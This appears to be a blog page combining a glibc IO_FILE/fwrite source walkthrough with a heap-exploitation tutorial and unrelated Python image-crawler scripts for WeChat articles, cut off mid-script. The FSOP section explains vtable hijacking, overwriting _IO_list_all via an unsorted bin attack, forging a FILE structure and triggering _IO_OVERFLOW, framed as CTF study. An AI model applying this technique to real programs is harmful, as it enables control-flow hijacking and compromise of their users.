IO_FILE source analysis: FSOP

vtable

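The IO_FILE structure contains one especially important member: the vtable.

The vtable is used for virtual-table dispatch. If the vtable pointer is hijacked, calls can be redirected to any function we need; we can even forge a whole vtable so that the program mistakenly uses our fake vtable.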

pwndbg> p/x*(struct _IO_FILE_plus*)_IO_list_all
$1 = {
file = {
_flags = 0xfbad2086,
_IO_read_ptr = 0x0,
_IO_read_end = 0x0,
_IO_read_base = 0x0,
_IO_write_base = 0x0,
_IO_write_ptr = 0x0,
_IO_write_end = 0x0,
_IO_buf_base = 0x0,
_IO_buf_end = 0x0,
_IO_save_base = 0x0,
_IO_backup_base = 0x0,
_IO_save_end = 0x0,
_markers = 0x0,
_chain = 0x7ffff7dd2620, // points to the next list node (after stderr comes stdout)
_fileno = 0x2, // fileno is 2 (the file descriptor of the standard error stream)
_flags2 = 0x0,
_old_offset = 0xffffffffffffffff,
_cur_column = 0x0,
_vtable_offset = 0x0,
_shortbuf = {0x0},
_lock = 0x7ffff7dd3770,
_offset = 0xffffffffffffffff,
_codecvt = 0x0,
_wide_data = 0x7ffff7dd1660,
_freeres_list = 0x0,
_freeres_buf = 0x0,
__pad5 = 0x0,
_mode = 0x0,
_unused2 = {0x0 <repeats 20 times>}
},
vtable = 0x7ffff7dd06e0 // target
}
pwndbg> p*(struct _IO_jump_t*)_IO_list_all.vtable // every field of the vtable can be hijacked
$6 = {
__dummy = 0,
__dummy2 = 0,
__finish = 0x7ffff7a869d0 <_IO_new_file_finish>,
__overflow = 0x7ffff7a87740 <_IO_new_file_overflow>,
__underflow = 0x7ffff7a874b0 <_IO_new_file_underflow>,
__uflow = 0x7ffff7a88610 <__GI__IO_default_uflow>,
__pbackfail = 0x7ffff7a89990 <__GI__IO_default_pbackfail>,
__xsputn = 0x7ffff7a861f0 <_IO_new_file_xsputn>,
__xsgetn = 0x7ffff7a85ed0 <__GI__IO_file_xsgetn>,
__seekoff = 0x7ffff7a854d0 <_IO_new_file_seekoff>,
__seekpos = 0x7ffff7a88a10 <_IO_default_seekpos>,
__setbuf = 0x7ffff7a85440 <_IO_new_file_setbuf>,
__sync = 0x7ffff7a85380 <_IO_new_file_sync>,
__doallocate = 0x7ffff7a7a190 <__GI__IO_file_doallocate>,
__read = 0x7ffff7a861b0 <__GI__IO_file_read>,
__write = 0x7ffff7a85b80 <_IO_new_file_write>,
__seek = 0x7ffff7a85980 <__GI__IO_file_seek>,
__close = 0x7ffff7a85350 <__GI__IO_file_close>,
__stat = 0x7ffff7a85b70 <__GI__IO_file_stat>,
__showmanyc = 0x7ffff7a89b00 <_IO_default_showmanyc>,
__imbue = 0x7ffff7a89b10 <_IO_default_imbue>
}
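
To make the layout of the table concrete, here is a minimal sketch that turns the field order from the dump above into byte offsets. It assumes a 64-bit target with 8-byte function pointers; JUMP_FIELDS, POINTER_SIZE and slot_offset are names made up for this illustration, not glibc identifiers.

```python
# Field order copied from the _IO_jump_t dump above.
JUMP_FIELDS = [
    "__dummy", "__dummy2", "__finish", "__overflow", "__underflow",
    "__uflow", "__pbackfail", "__xsputn", "__xsgetn", "__seekoff",
    "__seekpos", "__setbuf", "__sync", "__doallocate", "__read",
    "__write", "__seek", "__close", "__stat", "__showmanyc", "__imbue",
]
POINTER_SIZE = 8  # assumption: 64-bit process, every slot is one pointer


def slot_offset(name):
    """Byte offset of a vtable entry, counted from the start of the table."""
    return JUMP_FIELDS.index(name) * POINTER_SIZE


if __name__ == "__main__":
    for field in ("__overflow", "__xsputn", "__close"):
        print(field, hex(slot_offset(field)))
```

Under these assumptions __overflow is the fourth slot, at offset 0x18 from the start of the table.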

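Below is raycp's summary of the vtable calls.

vtable functions called by fread:

  • _IO_sgetn calls the vtable's _IO_file_xsgetn
  • _IO_doallocbuf calls the vtable's _IO_file_doallocate to initialize the input buffer
  • _IO_file_doallocate (in the vtable) calls the vtable's __GI__IO_file_stat to get the file information
  • __underflow calls the vtable's _IO_new_file_underflow to read the file data
  • _IO_new_file_underflow (in the vtable) calls the vtable's __GI__IO_file_read, which finally executes the read system call

vtable functions called by fwrite:

  • _IO_fwrite calls the vtable's _IO_new_file_xsputn
  • _IO_new_file_xsputn calls the vtable's _IO_new_file_overflow to set up and flush the buffer
  • _IO_new_file_overflow (in the vtable) calls the vtable's _IO_file_doallocate to initialize the output buffer
  • _IO_file_doallocate (in the vtable) calls the vtable's __GI__IO_file_stat to get the file information
  • _IO_SYSWRITE inside new_do_write calls the vtable's _IO_new_file_write, which finally executes the write system call

vtable functions called by fclose:

  • _IO_do_write, which flushes the buffer, calls functions in the vtable
  • _IO_SYSCLOSE, which closes the file descriptor, is the vtable's __close function
  • _IO_FINISH is the vtable's __finish function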

FSOP

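Now for today's main topic. FSOP stands for File Stream Oriented Programming. Its core is forging the _IO_list_all pointer (_IO_list_all always points to the first element of the current chain of FILE structures).

  • The core of the technique is hijacking the value of _IO_list_all in order to forge the linked list and the _IO_FILE entries in it. Forging alone only builds data, though; something still has to trigger it
  • The trigger FSOP uses is a call to _IO_flush_all_lockp. This function flushes the stream of every entry in the _IO_list_all list (equivalent to calling fflush on each FILE), which means it calls the __overflow entry (_IO_OVERFLOW) of _IO_FILE_plus.vtable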
_IO_flush_all_lockp (int do_lock)
{
int result = 0;
FILE *fp;
#ifdef _IO_MTSAFE_IO
_IO_cleanup_region_start_noarg (flush_cleanup);
_IO_lock_lock (list_all_lock);
#endif
for (fp = (FILE *) _IO_list_all; fp != NULL; fp = fp->_chain)
{
run_fp = fp;
if (do_lock)
_IO_flockfile (fp);
if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)/* condition 1: a forged FILE must satisfy this one... */
|| (_IO_vtable_offset (fp) == 0
&& fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
> fp->_wide_data->_IO_write_base))/* ...or this one */
)
&& _IO_OVERFLOW (fp, EOF) == EOF)/* walk _IO_list_all and call _IO_OVERFLOW with each qualifying _IO_FILE as the argument */
result = EOF;
if (do_lock)
_IO_funlockfile (fp);
run_fp = NULL;
}
#ifdef _IO_MTSAFE_IO
_IO_lock_unlock (list_all_lock);
_IO_cleanup_region_end (0);
#endif
return result;
}

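_IO_flush_all_lockp is triggered in these situations:

  • when libc runs its abort routine (abort can be reached by triggering malloc_printerr)
  • when exit is called
  • when execution returns from main

Preconditions for an FSOP attack:

  • a leaked libc address, so that the address of _IO_list_all is known
  • an arbitrary-address write, to point _IO_list_all at a controllable address
  • the ability to forge an _IO_FILE_plus structure in controllable memory

Checks that the forged _IO_FILE_plus structure has to pass (either one is enough):

1. fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base
or
2. _IO_vtable_offset (fp) == 0 && fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base)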
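
The two conditions can be restated as a small predicate, which makes it easier to see which field combinations reach _IO_OVERFLOW. This is only a model of the if-condition in _IO_flush_all_lockp: FileModel and reaches_overflow are hypothetical names, and the fields are plain integers rather than real pointers.

```python
from dataclasses import dataclass


@dataclass
class FileModel:
    """Only the fields that the flush condition looks at."""
    mode: int = 0
    write_base: int = 0
    write_ptr: int = 0
    vtable_offset: int = 0
    wide_write_base: int = 0
    wide_write_ptr: int = 0


def reaches_overflow(fp):
    """True when the condition in _IO_flush_all_lockp would call _IO_OVERFLOW."""
    narrow = fp.mode <= 0 and fp.write_ptr > fp.write_base
    wide = (fp.vtable_offset == 0 and fp.mode > 0
            and fp.wide_write_ptr > fp.wide_write_base)
    return narrow or wide


if __name__ == "__main__":
    print(reaches_overflow(FileModel()))                # nothing pending
    print(reaches_overflow(FileModel(write_ptr=1)))     # condition 1 holds
    print(reaches_overflow(FileModel(mode=1, wide_write_ptr=1)))  # condition 2
```

An all-zero structure fails both conditions, which is why a forged structure needs at least _IO_write_ptr greater than _IO_write_base when _mode is 0.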

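FSOP in practice

When planning an FSOP attack we usually do not have a controllable WAA (write-anything-anywhere) primitive. In that case an unsorted bin attack is used to write the address of main_arena + 88 into _IO_list_all, so the program treats main_arena + 88 as a FILE structure.

The location main_arena + 0xc0 (88 + 0x68) then becomes that FILE structure's _chain field. main_arena + 0xc0 also holds the pointer for the smallbin of size 0x60, so a chunk in the 0x60 smallbin is treated as the next FILE structure.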
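
The offset arithmetic above can be checked with a short sketch. All constants are assumptions: they describe struct malloc_state and struct _IO_FILE on x86-64 glibc 2.23 and may differ on other versions or architectures. chain_slot and smallbin_size are hypothetical helper names.

```python
# Assumed layout (x86-64, glibc 2.23).
TOP_OFFSET = 0x58     # main_arena + 88, the value the unsorted bin attack writes
BINS_OFFSET = 0x68    # offset of the bins[] array inside main_arena
CHAIN_OFFSET = 0x68   # offsetof(struct _IO_FILE, _chain)
POINTER_SIZE = 8


def chain_slot(fake_file_base=TOP_OFFSET):
    """Return (arena offset, bin index, 'fd' or 'bk') that _chain overlaps."""
    arena_offset = fake_file_base + CHAIN_OFFSET
    slot = (arena_offset - BINS_OFFSET) // POINTER_SIZE  # index into bins[]
    bin_index = slot // 2 + 1       # bin i uses bins[(i-1)*2] and bins[(i-1)*2+1]
    return arena_offset, bin_index, "fd" if slot % 2 == 0 else "bk"


def smallbin_size(bin_index):
    """Chunk size served by a smallbin (64-bit: index = size >> 4)."""
    return bin_index * 16


if __name__ == "__main__":
    offset, index, field = chain_slot()
    print(hex(offset), index, field, hex(smallbin_size(index)))
```

With these assumptions _chain lands on the bk pointer of bin 6, which is the smallbin for chunks of size 0x60, matching the description above.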

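At this point there are usually two options. One is to allocate a chunk of size 0x60 directly, get it placed at the head of the matching smallbin, and forge the structure inside it. The other is to change the size of the unsorted bin chunk to 0x61 through a heap overflow or a similar bug (taking care to avoid consolidation) and then request another chunk, which moves that unsorted bin chunk into the smallbin.

Next comes forging the FILE structure: only the address the vtable pointer refers to has to be forged, and a fake vtable is then written at that address.

When forging the vtable, the entry that matters is _IO_OVERFLOW (the 4th one). Because the FILE structure has been corrupted, the program runs into its error-reporting path, and the call chain of that path calls _IO_OVERFLOW along the way, which is exactly the entry we control.

That is the whole FSOP process. Studying house of orange is a good way to consolidate it.


This is a lot of text, so it is worth walking through it with an actual challenge.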

IO_FILE source analysis: fwrite

Straight to the source:

_IO_size_t
_IO_fwrite (buf, size, count, fp)
const void *buf;
_IO_size_t size;
_IO_size_t count;
_IO_FILE *fp;
{
_IO_size_t request = size * count;
_IO_size_t written = 0;
CHECK_FILE (fp, 0);
if (request == 0)
return 0;
_IO_cleanup_region_start ((void (*) __P ((void *))) _IO_funlockfile, fp);
_IO_flockfile (fp);
if (fp->_vtable_offset != 0 || _IO_fwide (fp, -1) == -1)
written = _IO_sputn (fp, (const char *) buf, request); /* vtable->__xsputn */
_IO_funlockfile (fp);
_IO_cleanup_region_end (0);
if (written == request)
return count;
else
return written / size;
}

The part to focus on here is _IO_sputn (vtable->__xsputn); the rest can be ignored.

# define _IO_new_file_xsputn _IO_file_xsputn

_IO_size_t
_IO_new_file_xsputn (f, data, n) /* n==request */
_IO_FILE *f;
const void *data;
_IO_size_t n;
{
register const char *s = (const char *) data;
_IO_size_t to_do = n;
int must_flush = 0;
_IO_size_t count;

if (n <= 0)
return 0;

/* First figure out how much space is available in the buffer. */
count = f->_IO_write_end - f->_IO_write_ptr; /* room left in the output buffer */
if ((f->_flags & _IO_LINE_BUF) && (f->_flags & _IO_CURRENTLY_PUTTING))
{
count = f->_IO_buf_end - f->_IO_write_ptr; /* line-buffered: measure up to the end of the buffer */
if (count >= n) /* the output buffer is large enough */
{
register const char *p;
for (p = s + n; p > s; )
{
if (*--p == '\n')
{
count = p - s + 1; /* only copy up to and including the last newline */
must_flush = 1;
break;
}
}
}
}
/* Then fill the buffer. */
if (count > 0) /* there is room: copy data into the output buffer first */
{
if (count > to_do)
count = to_do;
if (count > 20)
{
#ifdef _LIBC
f->_IO_write_ptr = __mempcpy (f->_IO_write_ptr, s, count);
#else
memcpy (f->_IO_write_ptr, s, count); /* copy the data into the output buffer */
f->_IO_write_ptr += count;
#endif
s += count; /* advance past the data already copied */
}
else
{
register char *p = f->_IO_write_ptr;
register int i = (int) count;
while (--i >= 0)
*p++ = *s++;
f->_IO_write_ptr = p;
}
to_do -= count; /* how much data is still left to output */
}
if (to_do + must_flush > 0)
/* data is left over: the output buffer is either not set up yet or already full */
{
_IO_size_t block_size, do_write;
/* Next flush the (full) buffer. */
if (_IO_OVERFLOW (f, EOF) == EOF)
return n - to_do;

/* Try to maintain alignment: write a whole number of blocks.
dont_write is what gets left over. */
block_size = f->_IO_buf_end - f->_IO_buf_base; /* size of one buffer block */
do_write = to_do - (block_size >= 128 ? to_do % block_size : 0);

if (do_write)
{
count = new_do_write (f, s, do_write);
to_do -= count;
if (count < do_write)
return n - to_do;
}

/* Now write out the remainder. Normally, this will fit in the
buffer, but it's somewhat messier for line-buffered files,
so we let _IO_default_xsputn handle the general case. */
if (to_do)
to_do -= _IO_default_xsputn (f, s+do_write, to_do);
}
return n - to_do;
}

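The main work of fwrite is done in _IO_new_file_xsputn. The overall flow has four parts:

  • First work out how much room is left in the output buffer; if there is any, copy the data into the output buffer (as much as fits)
  • If the output buffer has no room left (a buffer that has not been set up yet also counts) or not enough room, call _IO_OVERFLOW to set up or flush the output buffer
  • After the flush, check whether the remaining data is at least one block in size; if so, bypass the output buffer and write it block by block with new_do_write
  • If a little data is left after the block-wise write, call _IO_default_xsputn to copy it into the output buffer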
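
The four steps can be sketched as a toy model. This is a deliberate simplification rather than a port of the glibc code: it ignores line buffering, error handling, and the block_size >= 128 threshold, and BufferModel, capacity, sink and syscalls are names invented for the illustration.

```python
class BufferModel:
    """Toy model of the write path described above."""

    def __init__(self, capacity=8):
        self.capacity = capacity   # stands in for _IO_buf_end - _IO_buf_base
        self.buf = bytearray()     # pending bytes in the output buffer
        self.sink = bytearray()    # stands in for the file behind write(2)
        self.syscalls = 0          # how many simulated write calls happened

    def _flush(self):
        # Role of _IO_OVERFLOW(f, EOF): push the buffered bytes out.
        if self.buf:
            self.sink += self.buf
            self.syscalls += 1
            self.buf.clear()

    def write(self, data):
        data = bytes(data)
        # Step 1: copy as much as fits into the remaining buffer space.
        room = self.capacity - len(self.buf)
        head, rest = data[:room], data[room:]
        self.buf += head
        if rest:
            # Step 2: the buffer is full, flush it.
            self._flush()
            # Step 3: whole blocks bypass the buffer.
            direct = len(rest) - len(rest) % self.capacity
            if direct:
                self.sink += rest[:direct]
                self.syscalls += 1
            # Step 4: the tail goes back into the (now empty) buffer.
            self.buf += rest[direct:]
        return len(data)


if __name__ == "__main__":
    w = BufferModel(capacity=8)
    w.write(b"abc")
    w.write(b"0123456789ABCDEFGHIJ")
    print(bytes(w.sink), bytes(w.buf), w.syscalls)
```

In the example run the second write fills the buffer, flushes it, sends one whole 8-byte block straight to the sink, and leaves the 7-byte tail buffered.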

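The following sections go through these steps (the first part is already explained in the comments, so it is skipped).

Setting up or flushing the output buffer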

 if (to_do + must_flush > 0) 
/* data is left over: the output buffer is either not set up yet or already full */
{
_IO_size_t block_size, do_write;
if (_IO_OVERFLOW (f, EOF) == EOF)
return n - to_do;
......

Stepping into _IO_OVERFLOW:

#define _IO_OVERFLOW(FP, CH) JUMP1 (__overflow, FP, CH)

_IO_OVERFLOW is a virtual-table call (so it can be hijacked or forged, the usual FSOP approach). For a regular file stream it points to _IO_new_file_overflow.

# define _IO_new_file_overflow _IO_file_overflow

int
_IO_new_file_overflow (f, ch)
_IO_FILE *f;
int ch;
{
if (f->_flags & _IO_NO_WRITES)
/* check whether _flags contains the _IO_NO_WRITES bit */
{
f->_flags |= _IO_ERR_SEEN;
__set_errno (EBADF);
return EOF;
}

if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0 || f->_IO_write_base == 0)
{
if (f->_IO_write_base == 0) /* the output buffer has not been set up yet */
{
_IO_doallocbuf (f); /* call _IO_doallocbuf to allocate the output buffer */
_IO_setg (f, f->_IO_buf_base, f->_IO_buf_base, f->_IO_buf_base);
}
/* Otherwise must be currently reading.
If _IO_read_ptr (and hence also _IO_read_end) is at the buffer end,
logically slide the buffer forwards one block (by setting the
read pointers to all point at the beginning of the block). This
makes room for subsequent output.
Otherwise, set the read pointers to _IO_read_end (leaving that
alone, so it can continue to correspond to the external position). */
if (f->_IO_read_ptr == f->_IO_buf_end) /* initialize the other pointers */
f->_IO_read_end = f->_IO_read_ptr = f->_IO_buf_base;
f->_IO_write_ptr = f->_IO_read_ptr;
f->_IO_write_base = f->_IO_write_ptr;
f->_IO_write_end = f->_IO_buf_end;
f->_IO_read_base = f->_IO_read_ptr = f->_IO_read_end;

f->_flags |= _IO_CURRENTLY_PUTTING;
if (f->_mode <= 0 && f->_flags & (_IO_LINE_BUF+_IO_UNBUFFERED))
f->_IO_write_end = f->_IO_write_ptr;
}
if (ch == EOF)
return _IO_new_do_write(f, f->_IO_write_base,
f->_IO_write_ptr - f->_IO_write_base);
/* run _IO_new_do_write, which flushes the output buffer through the write system call */
if (f->_IO_write_ptr == f->_IO_buf_end ) /* Buffer is really full */
if (_IO_do_flush (f) == EOF)
return EOF;
*f->_IO_write_ptr++ = ch;
if ((f->_flags & _IO_UNBUFFERED)
|| ((f->_flags & _IO_LINE_BUF) && ch == '\n'))
if (_IO_new_do_write(f, f->_IO_write_base,
f->_IO_write_ptr - f->_IO_write_base) == EOF)
return EOF;
return (unsigned char) ch;
}

This function mainly flushes or sets up the output buffer. Its core is _IO_new_do_write (the rest of the code performs checks or updates settings).

# define _IO_new_do_write _IO_do_write

int
_IO_new_do_write (fp, data, to_do)
_IO_FILE *fp;
const char *data;
_IO_size_t to_do;
{
return (to_do == 0 || new_do_write (fp, data, to_do) == to_do) ? 0 : EOF;
}

static
int
new_do_write (fp, data, to_do)
_IO_FILE *fp;
const char *data;
_IO_size_t to_do;
{
_IO_size_t count;
if (fp->_flags & _IO_IS_APPENDING)
/* On a system without a proper O_APPEND implementation,
you would need to sys_seek(0, SEEK_END) here, but is
is not needed nor desirable for Unix- or Posix-like systems.
Instead, just indicate that offset (before and after) is
unpredictable. */
fp->_offset = _IO_pos_BAD;
else if (fp->_IO_read_end != fp->_IO_write_base)
{
_IO_off64_t new_pos
= _IO_SYSSEEK (fp, fp->_IO_write_base - fp->_IO_read_end, 1);
/* adjust the file offset */
if (new_pos == _IO_pos_BAD)
return 0;
fp->_offset = new_pos;
}
count = _IO_SYSWRITE (fp, data, to_do); /* write the data out through the system call (vtable->__write) */
if (fp->_cur_column && count)
fp->_cur_column = _IO_adjust_column (fp->_cur_column - 1, data, count) + 1;
_IO_setg (fp, fp->_IO_buf_base, fp->_IO_buf_base, fp->_IO_buf_base);
/* reset the buffer pointers */
fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_buf_base;
fp->_IO_write_end = (fp->_mode <= 0
&& (fp->_flags & (_IO_LINE_BUF+_IO_UNBUFFERED))
? fp->_IO_buf_base : fp->_IO_buf_end);
return count;
}

Writing the data out directly in blocks

      /* Try to maintain alignment: write a whole number of blocks.
dont_write is what gets left over. */
block_size = f->_IO_buf_end - f->_IO_buf_base; /* size of one buffer block */
do_write = to_do - (block_size >= 128 ? to_do % block_size : 0);
/* if the data exceeds the buffer size "f->_IO_buf_end - f->_IO_buf_base", the whole blocks bypass the output buffer for efficiency */

if (do_write)
{
count = new_do_write (f, s, do_write);
/* write whole blocks directly through new_do_write */
to_do -= count;
if (count < do_write)
return n - to_do;
}

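Having gone through _IO_OVERFLOW, the IO FILE buffer pointers are in their freshly flushed initial state, and the output buffer holds no data.

The size of the remaining output decides whether the output buffer is still used.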
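
The do_write computation is easy to try out on concrete numbers. The function below restates that one expression; split_direct_write is a hypothetical name, and the sample sizes are chosen purely for illustration.

```python
def split_direct_write(to_do, block_size):
    """Mirror of: do_write = to_do - (block_size >= 128 ? to_do % block_size : 0).

    Returns (do_write, remainder): bytes written directly in whole blocks,
    and bytes left over for the buffered path.
    """
    remainder = to_do % block_size if block_size >= 128 else 0
    return to_do - remainder, remainder


if __name__ == "__main__":
    print(split_direct_write(10000, 4096))  # two whole blocks, rest buffered
    print(split_direct_write(100, 4096))    # less than one block
    print(split_direct_write(100, 64))      # tiny buffer: everything direct
```

With a 4096-byte buffer, a 10000-byte request is split into 8192 bytes written directly and 1808 bytes left for _IO_default_xsputn; with a buffer smaller than 128 bytes the alignment is skipped and everything is written directly.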

Putting the remaining data into the output buffer

     /* Now write out the remainder.  Normally, this will fit in the
buffer, but it's somewhat messier for line-buffered files,
so we let _IO_default_xsputn handle the general case. */
if (to_do)
to_do -= _IO_default_xsputn (f, s+do_write, to_do);
}

Stepping into _IO_default_xsputn:

_IO_size_t
_IO_default_xsputn (f, data, n)
_IO_FILE *f;
const void *data;
_IO_size_t n;
{
const char *s = (char *) data;
_IO_size_t more = n;
if (more <= 0)
return 0;
for (;;)
{
/* Space available. */
_IO_ssize_t count = f->_IO_write_end - f->_IO_write_ptr;
if (count > 0)
{
if ((_IO_size_t) count > more)
count = more;
if (count > 20) /* more than 20 bytes: copy with memcpy */
{
#ifdef _LIBC
f->_IO_write_ptr = __mempcpy (f->_IO_write_ptr, s, count);
#else
memcpy (f->_IO_write_ptr, s, count);
f->_IO_write_ptr += count;
#endif
s += count;
}
else if (count <= 0)
count = 0;
else /* 20 bytes or fewer: copy byte by byte in a loop */
{
char *p = f->_IO_write_ptr;
_IO_ssize_t i;
for (i = count; --i >= 0; )
*p++ = *s++;
f->_IO_write_ptr = p;
}
more -= count;
}
if (more == 0 || _IO_OVERFLOW (f, (unsigned char) *s++) == EOF)
/* the buffer is full: call _IO_OVERFLOW to flush it and store the next byte */
break;
more--;
}
return n - more;
}

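The main job of this function is to copy the remaining data into the output buffer.


In the fwrite source we ran into an old friend: _IO_OVERFLOW.

_IO_OVERFLOW is a regular in FSOP: when a memory error occurs, _IO_flush_all_lockp is called, which in turn calls _IO_OVERFLOW. FSOP is so widely applicable precisely because this call is easy to trigger and easy to hijack (or forge).

In later exploitation write-ups I will focus on how FSOP works, mainly because I just did a challenge that combines FSOP with heap-based ORW (it nearly made me sick) and want to summarize it while the impression is fresh. Another reason is that my earlier FSOP summary was a bit sloppy.

Crawler Kid: good news for anime fans

When I get tired of studying low-level computing, I occasionally reward myself with something different (just kidding).

I have recently been reading the book 《Python网络数据采集》. It taught me a lot about networking and let me try out object-oriented programming, though the main goal was of course to learn web crawling.

Crawlers feel easy to pick up but probably hard to master (especially now that anti-crawling techniques keep getting more sophisticated). Here I record the crude crawlers I wrote...

Crawler Kid_V1.0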

from urllib.request import urlopen
from bs4 import BeautifulSoup

import requests as req
import os

def GetURL():
    target = input("please input your target:")
    html = urlopen(target)
    bsObj = BeautifulSoup(html, "html.parser")
    images = bsObj.findAll("img", {"class": "rich_pages wxw-img"})
    return images

def CreateImages(images, name):
    i = 0
    for image in images:
        i = i + 1
        response = image.attrs["data-src"]
        print("finish!!!, now you get " + str(i) + " images")
        num = "test_" + str(i)
        # the image type is the value after the last '=' in the URL
        dtype = response.split('=')[-1]
        num += '.' + dtype
        response = req.get(response)
        os.makedirs(name, exist_ok=True)
        with open(name + '/' + num, 'wb') as f:
            f.write(response.content)

images = GetURL()
CreateImages(images, name=input("please input its name:"))

Result:

I won't post the images here; anyone interested can run the crawler themselves...

Changelog:

  • version:v1.0
  • date:2022.3.31
  • type:
    • Features:NULL
    • Changed:NULL
    • Removed:NULL
  • desc:
    • First version, very limited functionality

Crawler Kid_V1.1

from urllib.request import urlopen
from bs4 import BeautifulSoup
import requests as req
import random
import time
import os

nowTime = time.time()
random.seed(nowTime)

def GetURL():
    target = input("please input your target:")
    html = urlopen(target)
    bsObj = BeautifulSoup(html, "html.parser")
    return bsObj

def GetRandomURL(link_list):
    target = link_list[random.randint(0, len(link_list) - 1)]
    html = urlopen(target)
    bsObj = BeautifulSoup(html, "html.parser")
    name = GetName(bsObj)
    print("The next one is " + name)
    print("Do you want to Download it?")
    choice = input("Please input yes or no\n")
    if choice == "yes":
        print("You want to Continue OK~~~")
        images = Getimage(bsObj)
        Download(images, name)
    elif choice == "no":
        print("Try again?")
        choice = input("Please input yes or no\n")
        if choice == "yes":
            GetRandomURL(link_list)
        else:
            Exit()
    else:
        print("Wrong choice~~~~")
        Exit()

def More():
    print("Do you want more?")
    choice = input("Please input yes or no\n")
    if choice == "yes":
        print("hahaha I know you~~~~")
        Return()
    elif choice == "no":
        Exit()
    else:
        print("Wrong choice~~~~")
        Exit()
    # ask again after each download
    More()

def Return():
    target = "https://mp.weixin.qq.com/mp/appmsgalbum?__biz=MzUzNjA0MjkxMw==&action=getalbum&album_id=2119868775733706753&scene=173&from_msgid=2247561088&from_itemidx=1&count=3&nolastread=1#wechat_redirect"
    html = urlopen(target)
    bsObj = BeautifulSoup(html, "html.parser")
    link_list = GetLinks(bsObj)
    GetRandomURL(link_list)

def Getimage(bsObj):
    images = bsObj.findAll("img", {"class": "rich_pages wxw-img"})
    return images

def GetName(bsObj):
    title = bsObj.find("h1", {"class": "rich_media_title"})
    name = "image-" + title.string.split('【二次元壁纸分享】')[-1][:3]
    return name

def GetLinks(bsObj):
    links = bsObj.findAll("li", {"class": "album__list-item js_album_item js_wx_tap_highlight wx_tap_cell"})
    link_list = []
    for link in links:
        if link.attrs['data-link'] is not None:
            if link.attrs['data-link'] not in link_list:
                link_list.append(link.attrs['data-link'])
    return link_list

def Download(images, name):
    i = 0
    for image in images:
        i = i + 1
        print("finish!!!, now you get " + str(i) + " images")
        response = image.attrs["data-src"]
        num = name + "-" + str(i)
        dtype = response.split('=')[-1]
        num += '.' + dtype
        response = req.get(response)
        os.makedirs(name, exist_ok=True)
        with open(name + '/' + num, 'wb') as f:
            f.write(response.content)

def Exit():
    print("exit~~~~bye~~~~")
    exit(0)

bsObj = GetURL()
images = Getimage(bsObj)
name = GetName(bsObj)
Download(images, name)
More()

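Changelog:

  • version:v1.1
  • date:2022.4.2
  • type:
    • Features:after a download finishes you can choose to keep downloading; some internal links are indexed for further downloads; the crawler is more interactive
    • Changed:NULL
    • Removed:the prompt for a file name
  • desc:
    • Somewhat more capable, but no qualitative change

Crawler Kid_V1.2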

from urllib.request import urlopen
from bs4 import BeautifulSoup
import requests as req
import os

n = 0  # total number of images downloaded so far

def GetNextURL(target):
    html = urlopen(target)
    bsObj = BeautifulSoup(html, "html.parser")
    name = GetName(bsObj)
    print("The next one is " + name)
    return bsObj

def GetAllURL():
    target = "https://mp.weixin.qq.com/mp/appmsgalbum?__biz=MzUzNjA0MjkxMw==&action=getalbum&album_id=2119868775733706753&scene=173&from_msgid=2247561088&from_itemidx=1&count=3&nolastread=1#wechat_redirect"
    html = urlopen(target)
    bsObj = BeautifulSoup(html, "html.parser")
    link_list = GetLinks(bsObj)
    return link_list

def Getimage(bsObj):
    images = bsObj.findAll("img", {"class": "rich_pages wxw-img"})
    return images

def GetName(bsObj):
    title = bsObj.find("h1", {"class": "rich_media_title"})
    name = "image-" + title.string.split('【二次元壁纸分享】')[-1][:3]
    return name

def GetLinks(bsObj):
    links = bsObj.findAll("li", {"class": "album__list-item js_album_item js_wx_tap_highlight wx_tap_cell"})
    link_list = []
    for link in links:
        if link.attrs['data-link'] is not None:
            if link.attrs['data-link'] not in link_list:
                link_list.append(link.attrs['data-link'])
    return link_list

def DownloadApart(images, name):
    # store each album in its own directory
    global n
    i = 0
    for image in images:
        i += 1
        n += 1
        print("finish!!!, now you get " + str(n) + " images")
        response = image.attrs["data-src"]
        num = name + "-" + str(i)
        dtype = response.split('=')[-1]
        num += '.' + dtype
        response = req.get(response)
        os.makedirs(name, exist_ok=True)
        with open(name + '/' + num, 'wb') as f:
            f.write(response.content)

def DownloadTogether(images, name):
    # store every image in the current directory
    global n
    i = 0
    for image in images:
        i += 1
        n += 1
        print("finish!!!, now you get " + str(n) + " images")
        response = image.attrs["data-src"]
        num = name + "-" + str(i)
        dtype = response.split('=')[-1]
        num += '.' + dtype
        response = req.get(response)
        with open(num, 'wb') as f:
            f.write(response.content)

print("Do you want to Together or Apart?")
choice = input("Please input 't' for Together 'a' for Apart\n")

link_list = GetAllURL()
for link in link_list:
    bsObj = GetNextURL(link)
    images = Getimage(bsObj)
    name = GetName(bsObj)

    if choice == "t":
        DownloadTogether(images, name)
    elif choice == "a":
        DownloadApart(images, name)
    else:
        print("Wrong choice~~~~")

print("All images finish!!!!!")

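Grabbed 181 images in one go, not bad...

Changelog:

  • version:v1.2
  • date:2022.4.2
  • type:
    • Features:images can be stored in separate folders or all together
    • Changed:new design: run it and it works, with hardly any interaction needed
    • Removed:most of the control flow
  • desc:
    • A variant of v1.1 meant to fetch many images quickly with less interaction; as a result the program cannot be controlled and downloads the same images again
    • The output directory sometimes has to be adjusted by hand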
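
One possible way to avoid the repeated downloads noted above is to remember which image URLs have already been fetched. The helper below is only a sketch and not part of any released version: unique_urls and the seen set are hypothetical, and it assumes that two identical data-src strings always refer to the same image.

```python
def unique_urls(urls, seen=None):
    """Return the URLs not seen before, in order, and record them in `seen`."""
    seen = set() if seen is None else seen
    fresh = []
    for url in urls:
        if url not in seen:
            seen.add(url)
            fresh.append(url)
    return fresh


if __name__ == "__main__":
    seen = set()
    print(unique_urls(["a", "b", "a"], seen))  # first album
    print(unique_urls(["b", "c"], seen))       # later album sharing one image
```

Passing the same set to every call keeps the memory across albums, so only the returned URLs would need to be requested.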

Crawler Kid_V1.3

Desktop-pet edition: the code was tidied up and the functions were organized into a class.

from urllib.request import urlopen
from bs4 import BeautifulSoup
import requests as req
import os

class Crawler():
    def __init__(self):
        self.stop = 0
        self.n = 0

    def GetNextURL(self, target):
        self.html = urlopen(target)
        self.bsObj = BeautifulSoup(self.html, "html.parser")
        self.name = self.GetName(self.bsObj)
        if self.name is None:
            print("Something wrong...")
        else:
            print("The next one is " + self.name)
        return self.bsObj

    def GetAllURL(self):
